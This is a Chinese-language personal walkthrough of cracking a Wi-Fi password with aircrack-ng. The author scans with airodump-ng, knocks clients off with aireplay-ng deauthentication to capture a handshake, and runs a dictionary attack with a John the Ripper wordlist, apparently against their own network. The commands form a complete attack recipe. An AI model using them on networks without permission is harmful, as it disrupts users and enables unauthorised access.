airodump-ng wlan0mon
掃描,收集信息,記錄BSSID,CH,ESSID
然后airodump-ng -c 10(信道) --bssid xx:xx:xx:xx:xx:xx(MAC地址)-w WEP(文件名)wlan0mon
現在就是等新的客戶端連接該AP,連接的時候才能抓到握手包。成功抓包后是這個樣子(網圖,來源)
如果是自己測試,可以用aireplay-ng --deauth 20(發送的接觸認證幀數量) -a xx:xx:xx:xx:xx:xx(AP的MAC地址) wlan0mon來斷開已連接客戶端與AP的連接,迫使客戶端重新發送握手包進行連接。
但是我在kali上死活抓不到包,問了群里的老哥,說kali抓這個包看血統,既然如此那就和我等非酋無關了。所以決定去CDlinux下測試
這里指一下路:http://cdlinux.net/cdlinux-2-1-1.html
補充,在群里大佬的指示下得到一個新的強迫客戶端下線的命令:aireplay-ng -0 20 –a <ap mac> -c < mymac > wlan
不過在這里直接使用會出現一個問題,即wlan0mon is on channel 3, but the AP uses channel 11
這是因為頻道被切換,在網上查找資料后有說是內核版本原因,也有說是驅動程序問題。
解決方法:先用airodump-ng找到要目標AP所在的信道,然后使用-c參數來固定一個信道掃描
用這個方法成功過一次,但是沒有保存文件,,,,,很氣
最后一通亂搞,我是用這個完成抓包的
airodump-ng wlan0mon -w WEP1 -c 8
另一個終端執行
aireplay-ng -0 20 –a <ap mac> -c < mymac > wlan
如果沒有抓到,那就多執行幾遍aireplay-ng或者把20換成別的更大的數字試試
抓到包后,就是比較簡單的跑字典了
aircrack-ng -w /root/john-1.8.0/run/password.lst 1.cap
因為是測試,就隨便在john里面找了一個密碼文件,然后在最后加上自己的wifi密碼。
3500跳數據,1秒都沒有就出來了。。。。。
(最后打碼的是密碼)
這速度真心可以啊